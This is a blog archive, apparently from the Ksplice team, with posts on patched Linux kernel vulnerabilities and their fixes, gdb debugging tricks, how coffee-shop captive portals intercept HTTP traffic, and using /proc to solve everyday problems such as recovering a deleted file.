Wednesday Jul 22, 2015

Fixing Security Vulnerabilities in Linux

Security vulnerabilities are some of the hardest bugs to discover yet they can have the largest impact. At Ksplice, we spend a lot of time looking at security vulnerabilities and seeing how they are fixed. We use automated tools such as the Trinity syscall fuzzer and the Kernel Address Sanitizer (KASan) to aid our process. In this blog post we'll go over some case studies of recent vulnerabilities and show you how you can avoid them in your code.

CVE-2013-7339 and CVE-2014-2678

These two are very similar NULL pointer dereferences that occur when trying to bind an RDS socket without having an RDS device. This is an oversight that happens quite often in hardware-specific code in the kernel. It is easy for developers to assume that a piece of hardware always exists since all their dev machines have it, but that sometimes leads to other possible hardware configurations being left untested. In this example the code makes a seemingly reasonable assumption that using RDS sockets without RDS hardware doesn't really make sense.

The issue is pretty simple as we can see from this fix:

diff --git a/net/rds/ib.c b/net/rds/ib.c
index b4c8b00..ba2dffe 100644
--- a/net/rds/ib.c
+++ b/net/rds/ib.c
@@ -338,7 +338,8 @@ static int rds_ib_laddr_check(__be32 addr)
        ret = rdma_bind_addr(cm_id, (struct sockaddr *)&sin);
        /* due to this, we will claim to support iWARP devices unless we
           check node_type. */
-       if (ret || cm_id->device->node_type != RDMA_NODE_IB_CA)
+       if (ret || !cm_id->device ||
+           cm_id->device->node_type != RDMA_NODE_IB_CA)
                ret = -EADDRNOTAVAIL;

        rdsdebug("addr %pI4 ret %d node type %d\n",

Generally we are allowed to bind an address without a physical device, so we can reach this code without any RDS hardware. Sadly, this code wrongly assumes that a device exists at this point and that cm_id->device is not NULL, leading to a NULL pointer dereference.
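
The shape of the fix can be modelled outside the kernel. The following is a minimal Python sketch, not the kernel code: CmId, Device, and laddr_check are made-up stand-ins, None plays the role of a NULL cm_id->device, and the value given to RDMA_NODE_IB_CA is a placeholder. The point it illustrates is the ordering of the tests, since the presence check has to short-circuit before the field access.

```python
import errno
from dataclasses import dataclass
from typing import Optional

RDMA_NODE_IB_CA = 1  # placeholder value for this sketch


@dataclass
class Device:
    node_type: int


@dataclass
class CmId:
    device: Optional[Device]  # None models "no RDS hardware behind this id"


def laddr_check(cm_id: CmId, bind_result: int = 0) -> int:
    """Return 0 if the address is usable, otherwise a negative errno."""
    ret = bind_result
    # The "device is None" test must come before the node_type access;
    # `or` short-circuits, so a missing device is never dereferenced.
    if ret or cm_id.device is None or cm_id.device.node_type != RDMA_NODE_IB_CA:
        ret = -errno.EADDRNOTAVAIL
    return ret


print(laddr_check(CmId(device=None)))
print(laddr_check(CmId(device=Device(RDMA_NODE_IB_CA))))
```

Dropping the middle test reproduces the original bug in miniature: the first call would raise an AttributeError instead of returning an error code.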

These types of issues are usually caught early in -next, since that exposes the code to various users and hardware configurations, but this one managed to slip through somehow.

There are many variations of the scenario where hardware-specific and other kernel code doesn't handle cases which "don't make sense". Another recent example is dlmfs. The kernel would panic when trying to create a directory on it, something that doesn't happen in regular usage of dlmfs.


This one is interesting and very difficult to stumble upon by accident. It's a race condition that is only possible during the migration of huge pages between NUMA nodes, so the window of opportunity is *very* small. It can be triggered by trying to dump the NUMA maps of a process while its memory is being moved around. What happens is that the code trying to dump memory makes invalid memory accesses because it does not check the presence of the memory beforehand.

When we dump NUMA maps we need to walk memory entries using walk_page_range():

        /*
         * Handle hugetlb vma individually because pagetable
         * walk for the hugetlb page is dependent on the
         * architecture and we can't handled it in the same
         * manner as non-huge pages.
         */
        if (walk->hugetlb_entry && (vma->vm_start <= addr) &&
            is_vm_hugetlb_page(vma)) {
                if (vma->vm_end < next)
                        next = vma->vm_end;
                /*
                 * Hugepage is very tightly coupled with vma,
                 * so walk through hugetlb entries within a
                 * given vma.
                 */
                err = walk_hugetlb_range(vma, addr, next, walk);
                if (err)
                        break;
                pgd = pgd_offset(walk->mm, next);
                continue;
        }

When walk_page_range() detects a hugepage it calls walk_hugetlb_range(), which calls the proc's callback (provided by walk->hugetlb_entry()) for each page individually:

        pte_t *pte;
        int err = 0;

        do {
                next = hugetlb_entry_end(h, addr, end);
                pte = huge_pte_offset(walk->mm, addr & hmask);
                if (pte && walk->hugetlb_entry)
                        err = walk->hugetlb_entry(pte, hmask, addr, next, walk);
                if (err)
                        return err;
        } while (addr = next, addr != end);

Note that the callback is executed for each pte, even for those that are not present in memory (pte_present(*pte) would return false in that case). This is done by the walker code because it was assumed that callback functions might want to handle that scenario for some reason. In the past there was no way for a huge pte to be absent, but that changed when hugepage migration was introduced. During page migration unmap_and_move_huge_page() removes huge ptes:

        if (page_mapped(hpage)) {
                [...]
                page_was_mapped = 1;
        }


Unfortunately, some callbacks were not changed to deal with this new possibility. A notable example is gather_pte_stats(), which tries to lock a non-existent pte:

        orig_pte = pte = pte_offset_map_lock(vma->vm_mm, pmd, addr, &ptl);

This can cause a panic if it happens during a tiny window inside unmap_and_move_huge_page().

Dumping NUMA maps doesn't happen too often and is mainly used for testing/debugging, so this bug has lived there for quite a while and was made visible only recently when hugepage migration was added.

Adding userspace interfaces that trigger rarely called kernel code also commonly exposes many issues. This happened recently when the firmware loading code was exposed to userspace.


This one also falls into the category of "doesn't make sense" because it involves repeated page faulting of memory that we marked as unwanted. When this happens shmem tries to remove a block of memory, but since it's getting faulted over and over again shmem will hang waiting until it's available for removal. Meanwhile other filesystem operations will be blocked, which is bad because that memory may never become available for removal.

When we're faulting a shmem page in, shmem_fault() would grab a reference to the page:

static int shmem_fault(struct vm_area_struct *vma, struct vm_fault *vmf)
{
        [...]
        error = shmem_getpage(inode, vmf->pgoff, &vmf->page, SGP_CACHE, &ret);

But because shmem_fallocate() holds i_mutex, this means that shmem_fallocate() can wait forever until it can free up that page. This, in turn, means that the filesystem is stuck waiting for shmem_fallocate() to complete.

Beyond that, punching holes in files and marking memory as unwanted are not common operations, especially not on a shmem filesystem. This means that those code paths are poorly tested.


This is a privilege escalation which was found using KASan. We noticed that, as a result of a call to a PPPOL2TP ioctl, an uninitialized address inside a struct was being read. Further investigation showed that this was the result of confusion about the type of the struct that was being accessed.

When we call setsockopt from userspace on a PPPOL2TP socket, we end up in pppol2tp_setsockopt(), which looks at the level parameter to see if the sockopt operation is intended for PPPOL2TP or the underlying UDP socket:

   if (level != SOL_PPPOL2TP)
      return udp_prot.setsockopt(sk, level, optname, optval, optlen);

PPPOL2TP tries to be helpful here and allows userspace to set UDP sockopts rather than just PPPOL2TP ones. The problem here is that UDP's setsockopt expects a udp_sock:

 int udp_lib_setsockopt(struct sock *sk, int level, int optname,
                        char __user *optval, unsigned int optlen,
                        int (*push_pending_frames)(struct sock *))
 {
         struct udp_sock *up = udp_sk(sk);

But instead it's getting just a sock struct.

It's possible to leverage this struct confusion to achieve privilege escalation. We can overwrite the function pointer in the struct to point to code of our choice. Then we can trigger the execution of this code by making another socket operation. The piece of code that allowed for this vulnerability was added for convenience, but no one ever needed it, and it was never tested.
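
The effect of handing one struct layout to code that expects another can be modelled in a few lines of Python with ctypes. This is only a sketch: the three layouts and all field names below are invented for illustration and do not match the kernel's real struct sock, struct udp_sock, or PPPOL2TP socket definitions. It shows how a write to a "UDP-only" field lands on top of an unrelated field of the object that was actually passed in.

```python
import ctypes


class Sock(ctypes.Structure):
    """Stands in for the common header both socket types start with."""
    _fields_ = [("state", ctypes.c_uint64)]


class UdpSock(ctypes.Structure):
    """What the UDP code believes it was given (hypothetical layout)."""
    _fields_ = [("sk", Sock),
                ("pending", ctypes.c_uint64),
                ("corkflag", ctypes.c_uint64)]


class TunnelSock(ctypes.Structure):
    """What it was actually given (hypothetical layout)."""
    _fields_ = [("sk", Sock),
                ("session_id", ctypes.c_uint64),
                ("callback", ctypes.c_uint64)]  # models a function pointer


def confuse(real, new_corkflag):
    """Reinterpret `real` as a UdpSock and write one UDP-only field."""
    as_udp = ctypes.cast(ctypes.pointer(real),
                         ctypes.POINTER(UdpSock)).contents
    as_udp.corkflag = new_corkflag  # same bytes as real.callback
    return real


victim = TunnelSock(Sock(1), 7, 0x1000)
confuse(victim, 0x41414141)
print(hex(victim.callback))
```

Both layouts are deliberately the same size here so the sketch never touches memory it does not own; in the real bug the two structs differ, which is part of what makes it exploitable.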


We hope that this exposition of straightforward and more subtle kernel bugs will remind readers of the importance of looking at code from a new perspective, and encourage the developer community to contribute to and create new tools and methodologies for detecting and preventing bugs in the kernel.

Monday Jan 24, 2011

8 gdb tricks you should know

Despite its age, gdb remains an amazingly versatile and flexible tool, and mastering it can save you huge amounts of time when trying to debug problems in your code. In this post, I'll share 8 tips and tricks for using GDB to debug more efficiently.

I'll be using the Linux kernel for examples throughout this post, not because these examples are necessarily realistic, but because it's a large C codebase that I know and that anyone can download and take a look at. Don't worry if you aren't familiar with Linux's source in particular -- the details of the examples won't matter too much.

  1. break WHERE if COND

    If you've ever used gdb, you almost certainly know about the break command, which lets you stop at some specified point in the debugged program.

    But did you know that you can set conditional breakpoints? If you add if CONDITION to a breakpoint command, you can include an expression to be evaluated whenever the program reaches that point, and the program will only be stopped if the condition is fulfilled. Suppose I was debugging the Linux kernel and wanted to stop whenever init got scheduled. I could do:

    (gdb) break context_switch if next == &init_task

    Note that the condition is evaluated by gdb, not by the debugged program, so you still pay the cost of the target stopping and switching to gdb every time the breakpoint is hit. As such, conditional breakpoints still slow the target down in relation to how often the target location is hit, not how often the condition is met.

  2. command

    In addition to conditional breakpoints, the command command lets you specify commands to be run every time you hit a breakpoint. This can be used for a number of things, but one of the most basic is to augment points in a program to include debug output, without having to recompile and restart the program. I could get a minimal log of every mmap() operation performed on a system using:

    (gdb) b do_mmap_pgoff 
    Breakpoint 1 at 0xffffffff8111a441: file mm/mmap.c, line 940.
    (gdb) command 1
    Type commands for when breakpoint 1 is hit, one per line.
    End with a line saying just "end".
    >print addr
    >print len
    >print prot
    >end

  3. gdb --args

    This one is simple, but a huge timesaver if you didn't know it. If you just want to start a program under gdb, passing some arguments on the command line, you can just build your command-line like usual, and then put "gdb --args" in front to launch gdb with the target program and the argument list both set:

    [~]$ gdb --args pizzamaker --deep-dish --toppings=pepperoni
    (gdb) show args
    Argument list to give program being debugged when it is started is
      " --deep-dish --toppings=pepperoni".
    (gdb) b main
    Breakpoint 1 at 0x45467c: file oven.c, line 123.
    (gdb) run

    I find this especially useful if I want to debug a project that has some arcane wrapper script that assembles lots of environment variables and possibly arguments before launching the actual binary (I'm looking at you, libtool). Instead of trying to replicate all that state and then launch gdb, simply make a copy of the wrapper, find the final "exec" call or similar, and add "gdb --args" in front.

  4. Finding source files

    I run Ubuntu, so I can download debug symbols for most of the packages on my system, and I can get source using apt-get source. But how do I tell gdb to put the two together? If the debug symbols include relative paths, I can use gdb's directory command to add the source directory to my source path:

    [~/src]$ apt-get source coreutils
    [~/src]$ sudo apt-get install coreutils-dbgsym
    [~/src]$ gdb /bin/ls
    GNU gdb (GDB) 7.1-ubuntu
    (gdb) list main
    1192    ls.c: No such file or directory.
        in ls.c
    (gdb) directory ~/src/coreutils-7.4/src/
    Source directories searched: /home/nelhage/src/coreutils-7.4:$cdir:$cwd
    (gdb) list main
    1192        }
    1193    }
    1195    int
    1196    main (int argc, char **argv)
    1197    {
    1198      int i;
    1199      struct pending *thispend;
    1200      int n_files;

    Sometimes, however, debug symbols end up with absolute paths, such as the kernel's. In that case, I can use set substitute-path to tell gdb how to translate paths:

    [~/src]$ apt-get source linux-image-2.6.32-25-generic
    [~/src]$ sudo apt-get install linux-image-2.6.32-25-generic-dbgsym
    [~/src]$ gdb /usr/lib/debug/boot/vmlinux-2.6.32-25-generic 
    (gdb) list schedule
    5519    /build/buildd/linux-2.6.32/kernel/sched.c: No such file or directory.
        in /build/buildd/linux-2.6.32/kernel/sched.c
    (gdb) set substitute-path /build/buildd/linux-2.6.32 /home/nelhage/src/linux-2.6.32/
    (gdb) list schedule
    5520    static void put_prev_task(struct rq *rq, struct task_struct *p)
    5521    {
    5522        u64 runtime = p->se.sum_exec_runtime - p->se.prev_sum_exec_runtime;
    5524        update_avg(&p->se.avg_running, runtime);
    5526        if (p->state == TASK_RUNNING) {
    5527            /*
    5528             * In order to avoid avg_overlap growing stale when we are

  5. Debugging macros

    One of the standard reasons almost everyone will tell you to prefer inline functions over macros is that debuggers tend to be better at dealing with inline functions. And in fact, by default, gdb doesn't know anything at all about macros, even when your project was built with debug symbols:

    (gdb) p GFP_ATOMIC
    No symbol "GFP_ATOMIC" in current context.
    (gdb) p task_is_stopped(&init_task)
    No symbol "task_is_stopped" in current context.

    However, if you're willing to tell GCC to generate debug symbols specifically optimized for gdb, using -ggdb3, it can preserve this information:

    $ make KCFLAGS=-ggdb3
    (gdb) break schedule
    (gdb) continue
    (gdb) p/x GFP_ATOMIC
    $1 = 0x20
    (gdb) p task_is_stopped_or_traced(init_task)
    $2 = 0

    You can also use the macro and info macro commands to work with macros from inside your gdb session:

    (gdb) macro expand task_is_stopped_or_traced(init_task)
    expands to: ((init_task->state & (4 | 8)) != 0)
    (gdb) info macro task_is_stopped_or_traced
    Defined at include/linux/sched.h:218
      included at include/linux/nmi.h:7
      included at kernel/sched.c:31
    #define task_is_stopped_or_traced(task) ((task->state & (__TASK_STOPPED | __TASK_TRACED)) != 0)

    Note that gdb actually knows in which contexts macros are and aren't visible, so when you have the program stopped inside some function, you can only access macros visible at that point. (You can see that the "included at" lines above show you through exactly what path the macro is visible).

  6. gdb variables

    Whenever you print a variable in gdb, it prints this weird $NN = before it in the output:

    (gdb) p 5+5
    $1 = 10

    This is actually a gdb variable that you can use to reference that same value any time later in your session:

    (gdb) p $1
    $2 = 10

    You can also assign your own variables for convenience, using set:

    (gdb) set $foo = 4
    (gdb) p $foo
    $3 = 4

    This can be useful to grab a reference to some complex expression or similar that you'll be referencing many times, or, for example, for simplicity in writing a conditional breakpoint (see tip 1).

  7. Register variables

    In addition to the numeric variables, and any variables you define, gdb exposes your machine's registers as pseudo-variables, including some cross-architecture aliases for common ones, like $sp for the stack pointer, or $pc for the program counter or instruction pointer.

    These are most useful when debugging assembly code or code without debugging symbols. Combined with a knowledge of your machine's calling convention, for example, you can use these to inspect function parameters:

    (gdb) break write if $rdi == 2

    will break on all writes to stderr on amd64, where the $rdi register is used to pass the first parameter.

  8. The x command

    Most people who've used gdb know about the print or p command, because of its obvious name, but I've been surprised how many don't know about the power of the x command.

    x (for "examine") is used to output regions of memory in various formats. It takes two arguments in a slightly unusual syntax:

    x/FMT ADDRESS


    ADDRESS, unsurprisingly, is the address to examine; it can be an arbitrary expression, like the argument to print.

    FMT controls how the memory should be dumped, and consists of (up to) three components:

    • A numeric COUNT of how many elements to dump
    • A single-character FORMAT, indicating how to interpret and display each element
    • A single-character SIZE, indicating the size of each element to display.

    x displays COUNT elements of length SIZE each, starting from ADDRESS, formatting them according to the FORMAT.

    There are many valid "format" arguments; help x in gdb will give you the full list, so here are my favorites:

    x/x displays elements in hex, x/d displays them as signed decimals, x/c displays characters, x/i disassembles memory as instructions, and x/s interprets memory as C strings.

    The SIZE argument can be one of: b, h, w, and g, for one-, two-, four-, and eight-byte blocks, respectively.
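
To make the three components concrete, here is a small Python sketch that splits a FMT string into COUNT, FORMAT, and SIZE. It is not gdb's parser: it assumes the count comes first, it only knows the format letters mentioned in this post, and the names parse_fmt and bytes_covered are made up for the illustration. A missing count is treated as 1; a missing format or size is returned as None rather than modelling gdb's defaults.

```python
import re

# Byte widths for the SIZE letters described above.
SIZE_BYTES = {"b": 1, "h": 2, "w": 4, "g": 8}
# Only the FORMAT letters mentioned in this post; gdb accepts more.
FORMATS = set("xdcis")


def parse_fmt(fmt):
    """Split an x/FMT string into (count, format_letter, size_letter)."""
    match = re.fullmatch(r"(\d*)([a-z]*)", fmt)
    if match is None:
        raise ValueError("expected digits followed by letters: %r" % fmt)
    count = int(match.group(1)) if match.group(1) else 1
    format_letter = size_letter = None
    for letter in match.group(2):
        if letter in SIZE_BYTES:
            size_letter = letter
        elif letter in FORMATS:
            format_letter = letter
        else:
            raise ValueError("letter not handled by this sketch: %r" % letter)
    return count, format_letter, size_letter


def bytes_covered(fmt):
    """Bytes spanned by the dump, or None when no SIZE letter was given."""
    count, _, size_letter = parse_fmt(fmt)
    if size_letter is None:
        return None
    return count * SIZE_BYTES[size_letter]


print(parse_fmt("8xg"), bytes_covered("8xg"))
print(parse_fmt("20i"))
```

So x/8xg asks for eight hex-formatted eight-byte elements, 64 bytes in total, while x/20i has no fixed byte span because instructions vary in length.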

    If you have debug symbols so that GDB knows the types of everything you might want to inspect, p is usually a better choice, but if not, x is invaluable for taking a look at memory.

    [~]$ grep saved_command /proc/kallsyms
    ffffffff81946000 B saved_command_line
    (gdb) x/s 0xffffffff81946000
    ffffffff81946000 <>:     "root=/dev/sda1 quiet"

    x/i is invaluable as a quick way to disassemble memory:

    (gdb) x/5i schedule
       0xffffffff8154804a <schedule>:   push   %rbp
       0xffffffff8154804b <schedule+1>: mov    $0x11ac0,%rdx
       0xffffffff81548052 <schedule+8>: mov    %gs:0xb588,%rax
       0xffffffff8154805b <schedule+17>:    mov    %rsp,%rbp
       0xffffffff8154805e <schedule+20>:    push   %r15

    If I'm stopped at a segfault in unknown code, one of the first things I try is something like x/20i $pc-40, to get a look at what the code I'm stopped at looks like.

    A quick-and-dirty but surprisingly effective way to debug memory leaks is to let the leak grow until it consumes most of a program's memory, and then attach gdb and just x random pieces of memory. Since the leaked data is using up most of memory, you'll usually hit it pretty quickly, and can try to interpret what it must have come from.



Monday Jan 17, 2011

Coffee shop Internet access

How does coffee shop Internet access work?


You pull out your laptop and type Google's address into the URL bar on your browser. Instead of your friendly search box, you get a page where you pay money or maybe watch an advertisement, agree to some terms of service, and are only then free to browse the web.

What is going on behind the scenes to give the coffee shop that kind of control over your packets? Let's trace an example of that process from first broadcast to last redirect and find out.

Step 1: Get our network configuration

When I first sit down and turn on my laptop, it needs to get some network information and join a wireless network.

My laptop is configured to use DHCP to request network configuration information and an IP address from a DHCP server in its Layer 2 broadcast domain.

This laptop happens to use the DHCP client dhclient. /etc/dhcp3/dhclient.conf is a sample dhclient configuration file describing among other things what the client will request from a DHCP server (your network manager might frob that configuration -- on my Ubuntu laptop, NetworkManager keeps a modified config at /var/run/nm-dhclient-wlan0.conf).

A DHCP negotiation happens in 4 parts:


Step 1: DHCP discovery. The DHCP client (us, in the screencap) sends a message to Ethernet broadcast address ff:ff:ff:ff:ff:ff to discover DHCP servers (Wireshark shows IP addresses in the summary view, so we see broadcast IP address 255.255.255.255). The packet includes a parameter request list with the parameters in the dhclient config file. The parameters in my /var/run/nm-dhclient-wlan0.conf are:

subnet-mask, broadcast-address, time-offset, routers,
domain-name, domain-name-servers, domain-search, host-name,
netbios-name-servers, netbios-scope, interface-mtu,
rfc3442-classless-static-routes, ntp-servers;

Step 2: DHCP offer. DHCP servers that get the discovery broadcast allocate an IP address and respond with a DHCP broadcast containing that IP address and other lease information. This is typically a simple race -- whoever gets an offer packet to the requester first wins. In our case, only MAC address 00:90:fb:17:ca:4e (Wireshark shows its IP address) answers our discovery broadcast.

Step 3: DHCP request. The DHCP client picks an offer and sends another DHCP broadcast, informing the DHCP servers of the winner and letting the losers de-allocate their reserved IP addresses.

Step 4: DHCP acknowledgment. The winning DHCP server acknowledges completion of the DHCP exchange and reiterates the DHCP lease parameters. We now have an IP address and know the IP address of our gateway router.

[Screenshot: DHCP lease]
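
The four-part exchange above can be written down as a tiny simulation. This is a sketch of the message order only, not of the DHCP wire format: the Offer class and negotiate function are made up for the illustration, the first server's MAC and the address it offers are the ones that appear in this capture, and the second server is purely hypothetical, added to show the race.

```python
from dataclasses import dataclass


@dataclass
class Offer:
    server_mac: str
    offered_ip: str


def negotiate(offers):
    """Walk the four messages for `offers`, listed in arrival order."""
    log = ["DISCOVER (broadcast)"]
    if not offers:
        return log, None  # nobody answered the discovery broadcast
    for offer in offers:
        log.append("OFFER from %s: %s" % (offer.server_mac, offer.offered_ip))
    winner = offers[0]  # simple race: the first offer to arrive wins
    # The request is broadcast too, so losing servers can free their address.
    log.append("REQUEST (broadcast) accepting %s" % winner.server_mac)
    log.append("ACK from %s: lease for %s" % (winner.server_mac, winner.offered_ip))
    return log, winner


offers = [
    Offer("00:90:fb:17:ca:4e", "192.168.5.87"),  # the server in this capture
    Offer("02:00:00:00:00:01", "192.0.2.10"),    # hypothetical slower server
]
log, winner = negotiate(offers)
print("\n".join(log))
```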

Step 2: Find our gateway

We managed to get a lot done using broadcast packets, but at this point a) nobody in our broadcast domain knows our MAC address, and b) we don't know the MAC address of our gateway, so we can't get any packets routed out to the Internet. Let's fix that:


Before offering us an IP address, the DHCP server (Portwell_17:ca:4e) sends an ARP request for that address, asking whoever holds it to respond with their MAC address. Since nobody answers, the server can be fairly confident that the IP address is not already in use.

After being assigned the IP address, we (Apple_8f:95:3f) double-check that nobody else is using it with a few ARP requests that nobody answers. We then send a few gratuitous ARPs to let everyone know that it's ours and they should update their ARP caches.

We then make an ARP request for the MAC address corresponding to the IP address of our gateway router. Our DHCP server happens to also be our gateway router and responds claiming the address.

Step 3: Get past the terms of service

Now that we have an IP address and know the IP address of our gateway, we should be able to send packets through our gateway and out to the Internet.

I type Google's hostname into my browser's URL bar. There is no period at the end, so the local DNS resolver can't tell if this is a fully-qualified domain name. This is what happens:

[Screenshot: DNS resolution]

Looking back at the DHCP acknowledgement, as part of the lease we were given a domain name. Since the hostname I typed potentially isn't fully-qualified, our local DNS resolver appends the domain name from the DHCP lease to it and tries to resolve that. When the resolution fails, it tries appending decreasingly specific parts of the DHCP domain name, finds that all of them fail, and then gives up and tries to resolve the plain hostname. This works, and we get back an IP address. A whois after the fact confirms that this is Google:

jesstess@pretzel-logic:~$ whois
NetRange: -
OriginAS:       AS15169
NetName:        GOOGLE
OrgName:        Google Inc.
OrgId:          GOGL
Address:        1600 Amphitheatre Parkway
City:           Mountain View
StateProv:      CA
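
The order in which the resolver tried names during that lookup can be sketched in Python. This only models the behaviour described in this post; the function name candidate_names and both example names are made up, and how far down the lease domain a real resolver walks depends on its configuration.

```python
def candidate_names(host, lease_domain):
    """List the names to try, in order, for a possibly unqualified host."""
    if host.endswith("."):
        return [host]  # a trailing period marks the name as fully qualified
    labels = lease_domain.strip(".").split(".")
    names = []
    # Append the whole lease domain first, then ever shorter suffixes of it.
    for start in range(len(labels)):
        names.append(host + "." + ".".join(labels[start:]))
    names.append(host)  # finally, the plain name exactly as typed
    return names


for name in candidate_names("www.example.org", "cafe.wifi.example"):
    print(name)
```

Every failed candidate costs a round trip to the DNS server, which is why typing the trailing period skips straight to the real lookup.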

We complete a TCP handshake with that address and make an HTTP GET request for the resource we want (/). Instead of getting back an HTTP 200 and the Google home page, we receive a 302 redirect to a URL with the query string MacAddr=00%3a23%3a6C%3a8F%3a95%3a3F&IpAddr=192%2e168%2e5%2e87&vsgpId=a45946c6%2d737a%2d11dd%2d8436%2d0090fb2004bc&vsgId=93196&UserAgent=&ProxyHost=:

[Screenshot: TCP handshake + HTTP]

Our MAC address and IP address are conveniently encoded in the redirect URL.
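
Percent-decoding the query string makes those values readable. Here is a short Python sketch using the standard library's urllib.parse; the query string is the one from the redirect above, with the line-wrap spaces removed.

```python
from urllib.parse import parse_qs

query = (
    "MacAddr=00%3a23%3a6C%3a8F%3a95%3a3F"
    "&IpAddr=192%2e168%2e5%2e87"
    "&vsgpId=a45946c6%2d737a%2d11dd%2d8436%2d0090fb2004bc"
    "&vsgId=93196&UserAgent=&ProxyHost="
)

# keep_blank_values keeps the empty UserAgent and ProxyHost parameters.
params = parse_qs(query, keep_blank_values=True)

print(params["MacAddr"][0])
print(params["IpAddr"][0])
```

The decoded MacAddr ends in 8F:95:3F, matching the Apple_8f:95:3f address Wireshark showed for our laptop.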

So what is going on here? Why didn't we get back the Google home page?

Our DHCP server/router is capturing our HTTP traffic and redirecting it to a special landing page. We don't get to make it out to Google until we finish playing a game with the coffee shop.

Let's dwell on this for a moment, because it's kind of amazing that, given the way the Internet is designed, our gateway router can hijack our HTTP requests and we can't stop it. In this case, we can see that the URL has changed in our browser after the redirect, but if a malicious gateway were transparently proxying our HTTP requests to an evil malware-laden clone of the site we asked for, we'd have no way to notice because there wouldn't be a redirect and the URL wouldn't change.

Worrisome? Definitely, if you're trusting a gateway with sensitive information. If you don't want to have to trust your gateway, you have to use end-to-end encryption: HTTPS, SSH, your favorite IPsec or SSL VPN, etc. And then hope there aren't bugs in your secure protocol's implementation.

Well, ain't nothing to it but to do a DNS lookup on the host name in the redirect and make our request there:


nmd is a host in the domain from our DHCP lease, so our local resolver's rules manage to resolve it in one try, and we get back an IP address. This is incidentally the IP address of the DHCP Server Identifier we received with our DHCP lease.

We try our HTTP GET request again there and get back an HTTP 200 and a landing page (still not the Google home page), which the browser renders.

The landing page has some ads and terms of service, and a button to click that we're told will grant us Internet access. That click generates an HTTP POST:


Step 4: Get to Google

Now that we have agreed to the terms of service, the landing page host tells our gateway router that our MAC address (which was passed in the redirect URL) should be added to a whitelist, and our traffic shouldn't be captured and redirected anymore: our HTTP packets should be allowed out onto the Internet. It responds to our POST with a final HTTP 302 redirect, this time to another site. We do a final DNS lookup, make our HTTP GET, and get served an HTTP 200 and a webpage with some ads enticing us to level up our coffee addiction. We now have real Internet access and can get to Google.

And that's the story! This ability to hijack HTTP traffic at a gateway until terms are met has over the years facilitated a huge industry based around private WiFi networks at coffee shops, airports, and hotels.

It is also a reminder about just how much control your gateway, or a device pretending to be your gateway, has when you use insecure protocols. Upside-down-ternet is a playful example of exploiting the trust in your gateway, but bogus DNS resolution or transparently proxying requests to malicious sites makes use of this same principle.


Monday Jan 10, 2011

Solving problems with proc

The Linux kernel exposes a wealth of information through the proc special filesystem. It's not hard to find an encyclopedic reference about proc. In this article I'll take a different approach: we'll see how proc tricks can solve a number of real-world problems. All of these tricks should work on a recent Linux kernel, though some will fail on older systems like RHEL version 4.

Almost all Linux systems will have the proc filesystem mounted at /proc. If you look inside this directory you'll see a ton of stuff:

keegan@lyle$ mount | grep ^proc
proc on /proc type proc (rw,noexec,nosuid,nodev)
keegan@lyle$ ls /proc
1      13     23     29672  462        cmdline      kcore         self
10411  13112  23842  29813  5          cpuinfo      keys          slabinfo
12934  15260  26317  4      bus        irq          partitions    zoneinfo
12938  15262  26349  413    cgroups    kallsyms     sched_debug

These directories and files don't exist anywhere on disk. Rather, the kernel generates the contents of /proc as you read it. proc is a great example of the UNIX "everything is a file" philosophy. Since the Linux kernel exposes its internal state as a set of ordinary files, you can build tools using basic shell scripting, or any other programming environment you like. You can also change kernel behavior by writing to certain files in /proc, though we won't discuss this further.

Each process has a directory in /proc, named by its numerical process identifier (PID). So for example, information about init (PID 1) is stored in /proc/1. There's also a symlink /proc/self, which each process sees as pointing to its own directory:

keegan@lyle$ ls -l /proc/self
lrwxrwxrwx 1 root root 64 Jan 6 13:22 /proc/self -> 13833

Here we see that 13833 was the PID of the ls process. Since ls has exited, the directory /proc/13833 will have already vanished, unless your system reused the PID for another process. The contents of /proc are constantly changing, even in response to your queries!
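
The same check works from inside any process. A minimal Python sketch, assuming a Linux system with proc mounted at /proc (the helper name proc_self_target is made up, and it returns None where /proc/self isn't available):

```python
import os


def proc_self_target():
    """Return what /proc/self points at, or None if /proc is unavailable."""
    try:
        return os.readlink("/proc/self")
    except OSError:
        return None


target = proc_self_target()
# On Linux these two normally agree: the link names the reader's own PID.
print(target, os.getpid())
```

Unlike the ls example, the process doing the reading is still alive when it prints the answer, so the directory it names still exists.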

Back from the dead

It's happened to all of us. You hit the up-arrow one too many times and accidentally wiped out that really important disk image.

keegan@lyle$ rm hda.img

Time to think fast! Luckily you were still computing its checksum in another terminal. And UNIX systems won't actually delete a file on disk while the file is in use. Let's make sure our file stays "in use" by suspending md5sum with control-Z:

keegan@lyle$ md5sum hda.img
^Z
[1]+  Stopped                 md5sum hda.img

The proc filesystem contains links to a process's open files, under the fd subdirectory. We'll get the PID of md5sum and try to recover our file:

keegan@lyle$ jobs -l
[1]+ 14595 Stopped                 md5sum hda.img
keegan@lyle$ ls -l /proc/14595/fd/
total 0
lrwx------ 1 keegan keegan 64 Jan 6 15:05 0 -> /dev/pts/18
lrwx------ 1 keegan keegan 64 Jan 6 15:05 1 -> /dev/pts/18
lrwx------ 1 keegan keegan 64 Jan 6 15:05 2 -> /dev/pts/18
lr-x------ 1 keegan keegan 64 Jan 6 15:05 3 -> /home/keegan/hda.img (deleted)
keegan@lyle$ cp /proc/14595/fd/3 saved.img
keegan@lyle$ du -h saved.img
320G    saved.img

Disaster averted, thanks to proc. There's one big caveat: making a full byte-for-byte copy of the file could require a lot of time and free disk space. In theory this isn't necessary; the file still exists on disk, and we just need to make a new name for it (a hardlink). But the ln command and associated system calls have no way to name a deleted file. On FreeBSD we could use fsdb, but I'm not aware of a similar tool for Linux. Suggestions are welcome!
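
The whole rescue can be rehearsed safely on a throwaway file. The following Python sketch assumes a Linux /proc; the function name and file contents are made up, and the process holds its own descriptor open rather than relying on a suspended md5sum.

```python
import os
import shutil
import tempfile


def recover_deleted_demo():
    """Delete a file that is still open, then copy it back out via /proc."""
    if not os.path.isdir("/proc/self/fd"):
        return None  # no Linux-style /proc on this system
    workdir = tempfile.mkdtemp()
    victim = os.path.join(workdir, "hda.img")
    saved = os.path.join(workdir, "saved.img")
    try:
        with open(victim, "wb") as f:
            f.write(b"precious data")
        holder = open(victim, "rb")  # keeps the file "in use"
        try:
            os.remove(victim)        # the name is gone, the data is not
            with open("/proc/self/fd/%d" % holder.fileno(), "rb") as src:
                with open(saved, "wb") as dst:
                    dst.write(src.read())
        finally:
            holder.close()
        with open(saved, "rb") as f:
            return f.read()
    finally:
        shutil.rmtree(workdir)


print(recover_deleted_demo())
```

As with the cp above, this makes a full copy of the data rather than giving the old file a new name.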

Redirect harder

Most UNIX tools can read from standard input, either by default or with a specified filename of "-". But sometimes we have to use a program which requires an explicitly named file. proc provides an elegant workaround for this flaw.

